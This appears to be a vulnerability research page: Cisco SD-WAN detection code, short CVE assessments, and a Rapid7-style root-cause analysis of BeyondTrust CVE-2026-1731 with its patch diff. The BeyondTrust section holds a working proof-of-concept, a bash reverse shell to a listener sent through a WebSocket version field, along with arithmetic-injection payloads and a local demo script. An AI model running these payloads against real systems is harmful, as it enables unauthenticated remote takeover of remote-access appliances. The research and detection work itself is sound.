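class VdaemonMessage:
    msg_type: int
    device_type: int               # upper nibble of byte 1 (0x30 -> 3, vSmart)
    flags: int
    domain_id: int
    site_id: int
    verify_status: Optional[int]   # only present for CHALLENGE_ACK_ACK


def parse_message(data: bytes) -> VdaemonMessage:
    """Decode a decrypted (inside-DTLS) vdaemon message; raises on truncated input."""
    if len(data) < HDR_LEN:
        raise ValueError(f"short vdaemon header: {len(data)} < {HDR_LEN} bytes")
    msg_type, dev, flags, _reserved, domain_id, site_id = struct.unpack(_HDR_FMT, data[:HDR_LEN])
    verify_status = None
    if msg_type == MSG_CHALLENGE_ACK_ACK:
        if len(data) < HDR_LEN + 1:
            raise ValueError("CHALLENGE_ACK_ACK without verify_status byte")
        verify_status = data[HDR_LEN]
    return VdaemonMessage(msg_type, dev >> 4, flags, domain_id, site_id, verify_status)


class PeerHandshakeAuditor:
    """Passive state audit of inbound control-plane messages, keyed by peer address.

    In the benign flow a peer proves its identity with CHALLENGE_ACK (9) before any
    CHALLENGE_ACK_ACK (10) is exchanged. A type-10 with verify_status=1 from a peer that
    never sent a type-9 skips the RSA check; a VMANAGE_TO_PEER (14) that follows it is
    the key-injection step described in the write-up.
    """

    def __init__(self):
        self._ack_seen = set()   # peers that sent CHALLENGE_ACK (identity proof)
        self._forced = set()     # peers flagged for a forged verify_status

    def observe(self, peer: str, data: bytes) -> Optional[str]:
        """Return an alert string for the anomalous message, or None."""
        msg = parse_message(data)
        if msg.msg_type == MSG_CHALLENGE_ACK:
            self._ack_seen.add(peer)
            return None
        if (msg.msg_type == MSG_CHALLENGE_ACK_ACK and msg.verify_status
                and peer not in self._ack_seen):
            self._forced.add(peer)
            return (f"{peer}: CHALLENGE_ACK_ACK with verify_status=1 but no prior CHALLENGE_ACK "
                    f"(domain {msg.domain_id}, site {msg.site_id})")
        if msg.msg_type == MSG_VMANAGE_TO_PEER and peer in self._forced:
            return f"{peer}: VMANAGE_TO_PEER after forged authentication (possible SSH key injection)"
        return None


# Constructed samples. The first is byte-for-byte the wire-format table above: type 10
# from a peer claiming to be a vSmart in domain 1, site 100, with verify_status=1.
# The other two are 12-byte headers only, since the page documents no body for them.
SAMPLE_ACK_ACK = bytes.fromhex("0a30a000" "00000001" "00000064" "0100")
SAMPLE_CHALLENGE_ACK = bytes.fromhex("0930a000" "00000001" "00000064")
SAMPLE_VMANAGE_TO_PEER = bytes.fromhex("0e30a000" "00000001" "00000064")

if __name__ == "__main__":
    auditor = PeerHandshakeAuditor()
    for alert in (auditor.observe("192.168.80.130", SAMPLE_ACK_ACK),
                  auditor.observe("192.168.80.130", SAMPLE_VMANAGE_TO_PEER)):
        print(alert)
```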
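Steps 1 and 2 of the validation checklist as added Python detection code (not from the write-up), run over the sample vsyslog and auth.log lines quoted in the IOCs section: it finds connection-up events with a null peer identity and links them to a `vmanage-admin` public-key login from the same source IP within a window. The syslog year is assumed, since the lines carry none.

```python
import re
from datetime import datetime, timedelta

# Syslog lines carry no year; one is assumed so timestamps can be compared.
ASSUMED_YEAR = 2026
_TS_RE = re.compile(r"^(\w{3})\s+(\d{1,2})\s+(\d{2}:\d{2}:\d{2})\s+\S+\s+")
_KV_RE = re.compile(r"\b(peer-system-ip|public-ip|new-state):(\S+)")
_SSH_RE = re.compile(r"Accepted publickey for (\S+) from (\S+) port (\d+)")
NULL_IDENTITIES = {"::", "0.0.0.0"}   # the "ghost peer" values named in the IOC section


def _timestamp(line):
    m = _TS_RE.match(line)
    if not m:
        return None
    return datetime.strptime(f"{ASSUMED_YEAR} {m.group(1)} {m.group(2)} {m.group(3)}",
                             "%Y %b %d %H:%M:%S")


def ghost_peer_events(vsyslog_lines):
    """Step 1: (time, public_ip) for connection-up events whose peer-system-ip is null."""
    events = []
    for line in vsyslog_lines:
        if "control-connection-state-change" not in line:
            continue
        fields = dict(_KV_RE.findall(line))
        if fields.get("new-state") != "up" or fields.get("peer-system-ip") not in NULL_IDENTITIES:
            continue
        ts = _timestamp(line)
        if ts is not None:
            events.append((ts, fields.get("public-ip")))
    return events


def admin_key_logins(auth_lines, user="vmanage-admin"):
    """(time, source_ip, client_port) for accepted public-key logins of the given user."""
    logins = []
    for line in auth_lines:
        m = _SSH_RE.search(line)
        ts = _timestamp(line)
        if m and ts is not None and m.group(1) == user:
            logins.append((ts, m.group(2), int(m.group(3))))
    return logins


def correlate(vsyslog_lines, auth_lines, window=timedelta(minutes=30)):
    """Step 2: link each ghost-peer event to a vmanage-admin login from the same IP."""
    findings = []
    logins = admin_key_logins(auth_lines)
    for peer_time, ip in ghost_peer_events(vsyslog_lines):
        for login_time, login_ip, port in logins:
            if login_ip == ip and peer_time <= login_time <= peer_time + window:
                findings.append({
                    "source_ip": ip,
                    "peering_at": peer_time.isoformat(),
                    "login_at": login_time.isoformat(),
                    "delta_seconds": int((login_time - peer_time).total_seconds()),
                    "ssh_client_port": port,
                })
    return findings


# Sample lines reproduced from the IOC section above (not captured from a live appliance).
SAMPLE_VSYSLOG = [
    'Mar  5 17:30:01 vsmart VDAEMON_0[1556]: %Viptela-vSmart-01-vdaemon_0-5-NTCE-1400002: Notification: '
    'control-connection-state-change severity-level:major host-name:"vSmart-01" system-ip:1.1.1.2 '
    'personality:vsmart peer-type:vsmart peer-system-ip::: peer-vmanage-system-ip:0.0.0.0 '
    'public-ip:192.168.80.130 public-port:38237 src-color:public-internet remote-color:(null) '
    'uptime:"0:00:00:00" new-state:up',
    'Mar  5 17:30:13 vsmart VDAEMON_0[1556]: %Viptela-vSmart-01-vdaemon_0-2-CRIT-1400002: Notification: '
    'control-no-active-vsmart severity-level:critical host-name:"vSmart-01" system-ip:1.1.1.2 personality:vsmart',
    'Mar  5 17:30:13 vsmart VDAEMON_0[1556]: %Viptela-vSmart-01-vdaemon_0-5-NTCE-1400002: Notification: '
    'control-connection-state-change severity-level:major host-name:"vSmart-01" system-ip:1.1.1.2 '
    'personality:vsmart peer-type:vsmart peer-system-ip::: peer-vmanage-system-ip:0.0.0.0 '
    'public-ip:192.168.80.130 public-port:38237 src-color:public-internet remote-color:(null) '
    'uptime:"0:00:00:11" new-state:down',
]
SAMPLE_AUTH_LOG = [
    "Mar  5 17:37:32 vsmart sshd[30257]: Postponed publickey for vmanage-admin from 192.168.80.130 port 54314 ssh2 [preauth]",
    "Mar  5 17:37:32 vsmart sshd[30257]: Accepted publickey for vmanage-admin from 192.168.80.130 port 54314 ssh2: "
    "RSA SHA256:wz2FD2K+z/6dLMnB1A3uzaRN7N2SnQ4kPgQZxSN+ERo",
    "Mar  5 17:37:32 vsmart sshd[30257]: pam_unix(sshd:session): session opened for user vmanage-admin(uid=1001) by (uid=0)",
]

if __name__ == "__main__":
    for finding in correlate(SAMPLE_VSYSLOG, SAMPLE_AUTH_LOG):
        print(finding)
```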
Technical Analysis
CVE-2026-20127 is a critical authentication bypass vulnerability affecting Cisco Catalyst SD‑WAN Controller and Cisco Catalyst SD‑WAN Manager that was patched on February 25, 2026. The vulnerability was originally identified and reported to Cisco by the Australian Signals Directorate’s Australian Cyber Security Centre as being exploited in the wild. This vulnerability has been added to the CISA KEV catalog.
CVE-2026-20127 is an authentication bypass vulnerability affecting Cisco Catalyst SD-WAN Controller and Manager systems. Exploitation allows a remote, unauthenticated attacker to submit specially crafted requests to the SD-WAN management/control plane, resulting in the creation of a trusted administrative session associated with an internal, high-privileged, non-root account.
In observed attacks documented in the Cisco SD-WAN Hunt Guide, this access was leveraged to register unauthorized (rogue) peers within the SD-WAN fabric. By inserting a malicious peer into the control plane, the attacker effectively established trusted device-level access, enabling configuration manipulation and broader control of the SD-WAN environment.
I’ve rated ‘Attacker Value’ as ‘Very High’, since Cisco is typically a huge target for threat actors, and also exploitation of this vulnerability allows access to critical infrastructure systems with elevated privileges. I’ve rated ‘Exploitability’ as ‘Moderate’, since this vulnerability has been identified as being exploited in the wild.
Technical Analysis
CVE-2025-40551 is one of four critical vulnerabilities affecting SolarWinds Web Help Desk that were patched on January 28, 2026. The vulnerability, which was reported to SolarWinds by Jimi Sebree of Horizon3.ai, is an unsafe deserialization bug, and it facilitates unauthenticated remote code execution on affected Web Help Desk systems. The issue is a patch bypass for a vulnerability that had two prior patch bypasses – CVE-2024-28986, a deserialization security flaw in the AjaxProxy component. This vulnerability, along with the patch bypasses, has been added to the CISA KEV catalog.
CVE-2025-40551 is exploited by using a different URI path than previous exploits did, bypassing sanitization measures. That, along with the inclusion of some whitelisted terms, sidesteps defensive checks that had previously been implemented to prevent exploitation. The Horizon3.ai writeup published by the original finders demonstrated a simple JNDI lookup gadget, but weaponized exploits for Web Help Desk on Windows and Linux are now available.
I’ve rated ‘Attacker Value’ as ‘Very High’, since the software is popular, it sees exploitation in the wild, and help desk software tends to contain a lot of sensitive information. I’ve rated ‘Exploitability’ as ‘Very High’, since the bug class is a reliable one and weaponized gadget chains are available.
Technical Analysis
CVE-2026-1340 and CVE-2026-1281 are two very similar critical vulnerabilities affecting Ivanti Endpoint Manager Mobile (EPMM) that were announced on January 29, 2026. The impact of exploitation of the vulnerabilities is unauthenticated root-level remote code execution on a sensitive mobile device endpoint management system, making these bugs valuable to attackers; an attacker that compromises EPMM would typically gain access to a wealth of PII collected from joined mobile endpoints, along with a privileged position over the devices themselves. Notably, at the time of disclosure, Ivanti advised that exploitation in the wild led to the discovery of the vulnerabilities, and CISA added an entry to the KEV catalog shortly after disclosure.
The security firm watchTowr published an excellent technical writeup that includes a proof-of-concept exploit, and a Rapid7 Metasploit module PR has been opened. I’ve rated ‘Attacker Value’ as ‘Very High’, since breaching EPMM also results in the compromise of sensitive information held by the many devices managed by it. I’ve rated ‘Exploitability’ as ‘Very High’, since the attack vector is a web API request and the bug class is a reliable one.
Technical Analysis
Overview
On February 6, 2026, BeyondTrust published an advisory for a new critical command injection vulnerability, CVE-2026-1731, affecting their products Remote Support (RS) and Privileged Remote Access (PRA).
Rapid7 Labs has reproduced this new vulnerability. Notably, it sits in the exact same endpoint as a previous high-profile vulnerability, CVE-2024-12356. While CVE-2024-12356 was exploited in the wild as a zero-day, this new vulnerability was reported to the vendor through coordinated disclosure, and there is no known exploitation in the wild at this time. The technical similarity between the two issues underlines both how readily this new vulnerability can be exploited and how valuable a target a solution like RS or PRA is to an attacker.
The following technical analysis details CVE-2026-1731. Our prior analysis of CVE-2024-12356 is recommended reading to better understand the target architecture and how to communicate to the affected endpoint.
Analysis
We begin by extracting the patch for CVE-2026-1731 – a file called BT26-02-RS.nss. We know from our prior analysis of CVE-2024-12356 that these patches are encrypted with a static key. Decrypting and extracting the contents of the patch reveals a number of interesting files; ./pre_scripts/bt26-02.sh, ./resources/thinA, ./resources/thinB, and ./resources/thinD.
```console
sfewer@sfewer-ubuntu-vm:~/Desktop/beyondtrust2026/patch$ openssl enc -d -in BT26-02-RS.nss -md sha1 -pass pass:"Bingb0ng, what she said; the Tw1st3d switch is RED" -aes-256-cbc > ./BT26-02-RS.tar 2>/dev/null
sfewer@sfewer-ubuntu-vm:~/Desktop/beyondtrust2026/patch$ tar -xvf BT26-02-RS.tar
cert_chain.pem
content
signature
signature.sha256
sne.version
sfewer@sfewer-ubuntu-vm:~/Desktop/beyondtrust2026/patch$ cat content | gunzip - | tar -xv
install
application_patch.conf
ingredi_patch.conf
pre_scripts/
pre_scripts/bt26-02.sh
resources/
resources/thinA
resources/thinB
resources/thinD
sfewer@sfewer-ubuntu-vm:~/Desktop/beyondtrust2026/patch$ ls -al
total 80
drwxrwxr-x 4 sfewer sfewer  4096 Feb 10 12:53 .
drwxrwxr-x 4 sfewer sfewer  4096 Feb 10 12:52 ..
-rw-r--r-- 1 sfewer sfewer   361 Feb  4 06:00 application_patch.conf
-rw------- 1 sfewer sfewer 11104 Feb 10 08:30 BT26-02-RS.nss
-rw-rw-r-- 1 sfewer sfewer 11081 Feb 10 12:53 BT26-02-RS.tar
-rw-r--r-- 1 sfewer sfewer  1846 Feb  4 06:00 cert_chain.pem
-rw-r--r-- 1 sfewer sfewer  8099 Feb  4 06:00 content
-rw-r--r-- 1 sfewer sfewer    45 Feb  4 06:00 ingredi_patch.conf
-rwxr--r-- 1 sfewer sfewer  7366 Feb  4 06:00 install
drwxr-xr-x 2 sfewer sfewer  4096 Feb  4 06:00 pre_scripts
drwxr-xr-x 2 sfewer sfewer  4096 Feb  4 06:00 resources
-rw-r--r-- 1 sfewer sfewer   512 Feb  4 06:00 signature
-rw-r--r-- 1 sfewer sfewer   512 Feb  4 06:00 signature.sha256
-rw-r--r-- 1 sfewer sfewer     2 Feb  4 06:00 sne.version
sfewer@sfewer-ubuntu-vm:~/Desktop/beyondtrust2026/patch$ ls -al ./resources/
total 44
drwxr-xr-x 2 sfewer sfewer  4096 Feb  4 06:00 .
drwxrwxr-x 4 sfewer sfewer  4096 Feb 10 12:53 ..
-rw-r--r-- 1 sfewer sfewer 10570 Feb  4 06:00 thinA
-rw-r--r-- 1 sfewer sfewer 10619 Feb  4 06:00 thinB
-rw-r--r-- 1 sfewer sfewer 10570 Feb  4 06:00 thinD
```
Examining the bt26-02.sh shell script, we can see that it patches the destination file $BG_app_root/app/thin-scc-wrapper with one of the three "thin" resource files, selected by the installed product version. As our test system runs version 24.1.2, which falls in the script's 23.2.1 to 25.1.5 range, we will explore ./resources/thinB. We can note that the destination thin-scc-wrapper script is where CVE-2024-12356 was located, and that it is reachable by an unauthenticated attacker via a WebSocket connection.
```bash
#!/bin/bash

# grab a few vars from the database
BUILD_COMMIT_NUM=$($BG_database_primary_cmd -t -c "select value from fixed_config where variable = 'build_commit_num'")
BUILD_COMMIT_HASH=$($BG_database_primary_cmd -t -c "select value from fixed_config where variable = 'build_commit_hash'")
BUILD_DATE=$($BG_database_primary_cmd -t -c "select value from fixed_config where variable = 'build_date'")

# sedcp, lifted pretty much directly from mkar with only the vars we care about
function sedcp # <srcfile> <destfile>
{
    src=$1
    shift 1
    dest=$1
    shift 1

    SED_EXPRS="
        s^%COMPANY%^$BG_company^g;
        s^%PRODUCT%^$BG_product^g;
        s^%VERSION%^$BG_version^g;
        s^%BUILD_VERSION%^$BG_version^g;
        s^%BUILD_COMMIT_NUM%^$BUILD_COMMIT_NUM^g;
        s^%BUILD_COMMIT_HASH%^$BUILD_COMMIT_HASH^g;
        s^%BUILD_DATE%^$BUILD_DATE^g;
    "
    sed -e "$SED_EXPRS" "$src" >"$dest"
}

function compare_versions # a.b.c[suffix] x.y.z[suffix] (the first one may be "UNKNOWN")
{
    # this function compares the version string in $1 to the version string in $2 and returns
    #   <0 if $1<$2
    #   ==0 if $1==$2
    #   >0 if $1>$2
    if [[ -z "$1" || "$1" == "UNKNOWN" ]]; then
        # "" or UNKNOWN is less than anything on the right
        echo -1
        return
    fi
    if [[ "$1" == "$2" ]]; then
        echo 0
        return
    fi
    # the complex sed is to retain only the numeric version and strip off any given suffix from the version string
    v1=$(echo "$1" | sed -e 's/^\([0-9][0-9]*\.[0-9][0-9]*\.[0-9][0-9]*\)[^0-9].*/\1/')
    v2=$(echo "$2" | sed -e 's/^\([0-9][0-9]*\.[0-9][0-9]*\.[0-9][0-9]*\)[^0-9].*/\1/')
    ver1=$(printf "%d%03d%03d" $(echo "$v1" | cut -f1 -d.) $(echo "$v1" | cut -f2 -d.) $(echo "$v1" | cut -f3 -d.) )
    ver2=$(printf "%d%03d%03d" $(echo "$v2" | cut -f1 -d.) $(echo "$v2" | cut -f2 -d.) $(echo "$v2" | cut -f3 -d.) )
    echo $(( $ver1 - $ver2 ))
}

# patch between 25.2.1 and 25.3.1 inclusive
if [[ $(compare_versions $BG_version "25.2.1") -ge 0 ]] && [[ $(compare_versions $BG_version "25.3.1") -le 0 ]]; then
    echo Copying thinA over $BG_app_root/app/thin-scc-wrapper
    sedcp resources/thinA $BG_app_root/app/thin-scc-wrapper
    exit 0
fi

# patch between 23.2.1 and 25.1.5 inclusive
if [[ $(compare_versions $BG_version "23.2.1") -ge 0 ]] && [[ $(compare_versions $BG_version "25.1.5") -le 0 ]]; then
    echo Copying thinB over $BG_app_root/app/thin-scc-wrapper
    sedcp resources/thinB $BG_app_root/app/thin-scc-wrapper
    exit 0
fi

# patch between 21.3.1 and 22.3.4 inclusive
if [[ $(compare_versions $BG_version "21.3.1") -ge 0 ]] && [[ $(compare_versions $BG_version "22.3.4") -le 0 ]]; then
    echo Copying thinD over $BG_app_root/app/thin-scc-wrapper
    sedcp resources/thinD $BG_app_root/app/thin-scc-wrapper
    exit 0
fi
```
Diffing thinB against thin-scc-wrapper shows that a sanity check has been added to the attacker-controlled remote version number. The new check ensures the value is a one- or two-digit number and contains nothing but ASCII digits. With this in mind, we now need to explore how this could lead to command injection.
@@ -48,6 +48,12 @@ blog "reading remoteVersion" read -t 30 remoteVersion || exit 1 blog "read remoteVersion as [$remoteVersion]" +# Validate remote version is a number (single or two-digit) +if [[ ! "$remoteVersion" =~ ^[0-9]{1,2}$ ]]; then + blog "ERROR: Invalid remote version - must be a 1-2 digit number" + exit 1 +fi +
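Review bot: the added allowlist `^[0-9]{1,2}$` is the right fix, since it rejects `[`, `$` and `(` before `remoteVersion` can reach the `-lt`/`-gt` arithmetic context, but the context line `blog "read remoteVersion as [$remoteVersion]"` still writes the unvalidated value to the log before the check runs, so an attacker's payload lands in the log verbatim; consider moving that `blog` call below the validation, or logging the rejected value only inside the new error branch. The same log line is also where defenders can hunt for attempts: any logged `remoteVersion` that is not one or two digits. Two smaller points: `read -t 30 remoteVersion` lacks `-r`, so backslashes are consumed before validation (harmless here because the regex rejects whatever non-numeric text survives, but `read -r` is the safer default), and the two-digit cap is an undocumented protocol assumption that should carry a comment, so that a future version 100 is not silently treated as a bad client.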
The thin-scc-wrapper script reads and processes the remoteVersion variable as follows:
```bash
# read their version number
read -t 30 remoteVersion || exit 1
blog "read remoteVersion as [$remoteVersion]"

# Assuming that the thin clients will be the more knowledgable of
# speaking older protocol versions. They can look at the server version
# and adjust to match easier than the trymax side.
version=""
if [[ "$localVersion" -lt "$remoteVersion" ]]; then
    version=$localVersion
else
    version=$remoteVersion
fi

# now we both agree on the protocol version
# =================================================================================================
# =================================================================================================
# =================================================================================================

if [[ $version -gt "$localVersion" ]]; then
    blog "unhandled protocol version [$version]"
    exit 1
fi
```
The command injection is present here but it is not immediately obvious unless you are very familiar with the nuances of Bash arithmetic evaluation. To assist us, we ask Gemini. The following Gemini response explains the problem very clearly:
Yes, there is a potential command injection (or more accurately, arbitrary code execution) vulnerability in this script.
While it looks like a simple numeric comparison, the way Bash handles the `[[ ... ]]` construct with the `-lt` (less than) and `-gt` (greater than) operators involves Arithmetic Evaluation.

The Vulnerability: Arithmetic Evaluation

In Bash, when using arithmetic operators like `-lt`, `-gt`, or `-eq` inside `[[ ]]`, the shell treats the operands as expressions. If an attacker can control the value of `remoteVersion`, they can pass a string that Bash will evaluate as code.

How an attacker would exploit it:

If an attacker provides a payload like:

`remoteVersion='a[$(touch /tmp/pwned)]0'`

When the script reaches this line:

`if [[ "$localVersion" -lt "$remoteVersion" ]]; then`

Bash evaluates `remoteVersion`. Because it sees the structure of an array index or an expression, it executes the command inside the subshell `$(...)` to determine the value.
Interestingly, a recent analysis by watchTowr for a different vulnerability in a different product (CVE-2026-1281 in Ivanti EPMM), published January 30, 2026, also shows a similar root cause due to arithmetic evaluation. We can note that the original finders of CVE-2026-1731, Hacktron, are using “AI-enabled variant analysis” for vulnerability discovery, so the recent work in this area may have helped their discovery, as they cite a date of January 31, 2026 as the discovery date – one day after the watchTowr analysis of CVE-2026-1281.
We now know that we can execute an arbitrary OS command by supplying a malicious version number as part of a WebSocket request, whereby the malicious version number will be in the form a[$(touch /tmp/pwned)].
We can construct a PoC for CVE-2026-1731 by modifying the PoC from our prior analysis. We need to connect to the WebSocket URI /nw. The remote service, i.e. the thin-scc-wrapper script, expects us to transmit a newline delimited sequence comprising a version number, a UUID for the “thin mint” cookie value, an authentication type, and a “gskey” value.
As we want to place our command injection in the version number, we construct our PoC as follows, with a bash reverse shell as the payload. The header value X-Ns-Company must be set to the target appliance's company name (we have previously shown in our Metasploit module for CVE-2024-12356 how to programmatically extract the company name).
Note: the below $ is escaped as \$ as we are running this on the command line.
```shell
echo -ne "hax[\$(/bin/bash -i >& /dev/tcp/192.168.1.23/4444 0>&1)]\naaaaaaaa-aaaa-aaaa-aaaaaaaaaaaa\n0\naaaa\n" | ./websocat -k wss://192.168.1.105:443/nw --protocol "ingredi support desk customer thin" -H "X-Ns-Company: myexamplecompany" --binary -n -
```
An Ncat listener on 192.168.1.23:4444 will catch the reverse shell.
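To make the root cause and the fix concrete, the following bash script is an added example written for this analysis; it is not BeyondTrust's thin-scc-wrapper or any code from the patch. It models the version negotiation quoted above in its unpatched and patched shapes, feeds each the same newline-delimited message the PoC sends (version, thin-mint UUID, auth type, gskey), and counts how many times an injected command actually runs. The marker file path, the payload, and the handling of the three fields after the version are assumptions made for the demo, not behaviour taken from the product.

```bash
#!/usr/bin/env bash
# Added example for this analysis, not BeyondTrust's thin-scc-wrapper. It models the
# version negotiation in its unpatched and patched shapes and counts how many times
# an injected command runs. Marker path, payload and the handling of the fields
# after the version are assumptions made for the demo.

# Assumption: a writable temp dir. The injected command appends one line per
# execution, so the line count is the number of times it was evaluated.
MARKER="${TMPDIR:-/tmp}/arith-inject-demo.$$"
reset_marker() { : > "$MARKER"; }
times_injected_ran() { wc -l < "$MARKER" | tr -d ' '; }

# Attacker-controlled "version number". An indexed-array subscript is itself an
# arithmetic expression and bash performs command substitution on it, so $(...)
# executes before any numeric comparison. The trailing 'echo 0' keeps the
# subscript valid so the script carries on instead of dying on a bad subscript.
PAYLOAD="a[\$(echo ran >> $MARKER; echo 0)]"

# Unpatched negotiation: [[ -lt ]] and [[ -gt ]] both evaluate their operands
# arithmetically, so the payload executes once per comparison it reaches.
negotiate_unpatched() {
    local localVersion="$1" remoteVersion="$2" version=""
    if [[ "$localVersion" -lt "$remoteVersion" ]]; then
        version=$localVersion
    else
        version=$remoteVersion
    fi
    if [[ $version -gt "$localVersion" ]]; then
        return 1    # "unhandled protocol version"
    fi
    printf '%s\n' "$version"
}

# Patched negotiation, same allowlist as the BT26-02 fix: only one or two ASCII
# digits may reach an arithmetic context. The comparison logic is unchanged.
negotiate_patched() {
    [[ "$2" =~ ^[0-9]{1,2}$ ]] || return 1    # invalid remote version
    negotiate_unpatched "$1" "$2"
}

# Server side of the PoC's wire format: four newline-delimited fields on stdin
# (version, thin-mint UUID, auth type, gskey). $1 names the negotiation
# function to use, $2 is the server's own protocol version.
handle_client() {
    local negotiate="$1" localVersion="$2"
    local remoteVersion thinMint authType gskey
    read -t 30 remoteVersion || return 1      # same read as the real script
    read -t 30 thinMint || return 1
    read -t 30 authType || return 1
    read -t 30 gskey || return 1
    "$negotiate" "$localVersion" "$remoteVersion"
}

# Sends the PoC-style message, with the payload in the version slot, to the
# negotiation function named in $1 and returns how often the injection fired.
count_executions() {
    reset_marker
    printf '%s\naaaaaaaa-aaaa-aaaa-aaaaaaaaaaaa\n0\naaaa\n' "$PAYLOAD" \
        | handle_client "$1" "$2" > /dev/null 2>&1 || true
    times_injected_ran
}

if [[ "${BASH_SOURCE[0]}" == "$0" ]]; then
    echo "unpatched: injected command ran $(count_executions negotiate_unpatched 5) time(s)"
    echo "patched:   injected command ran $(count_executions negotiate_patched 5) time(s)"
    echo "patched, honest client at version 3: negotiated $(printf '3\nu\n0\ng\n' | handle_client negotiate_patched 5)"
    rm -f "$MARKER"
fi
```

Run it with bash. Against the unpatched logic the injected command runs twice when the payload evaluates below the server's version, because the negotiated `version` is the attacker string and is evaluated a second time by the `[[ $version -gt "$localVersion" ]]` check; the patched logic rejects the payload before either comparison and still negotiates normally for a numeric client version.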
Remediation
BeyondTrust has released patches to remediate CVE-2026-1731 for the following versions:
- Privileged Remote Access (PRA) version 24.3.4 and earlier: patch BT26-02-PRA
- Remote Support (RS) version 25.3.1 and earlier: patch BT26-02-RS
BeyondTrust customers are urged to apply this patch on an urgent basis.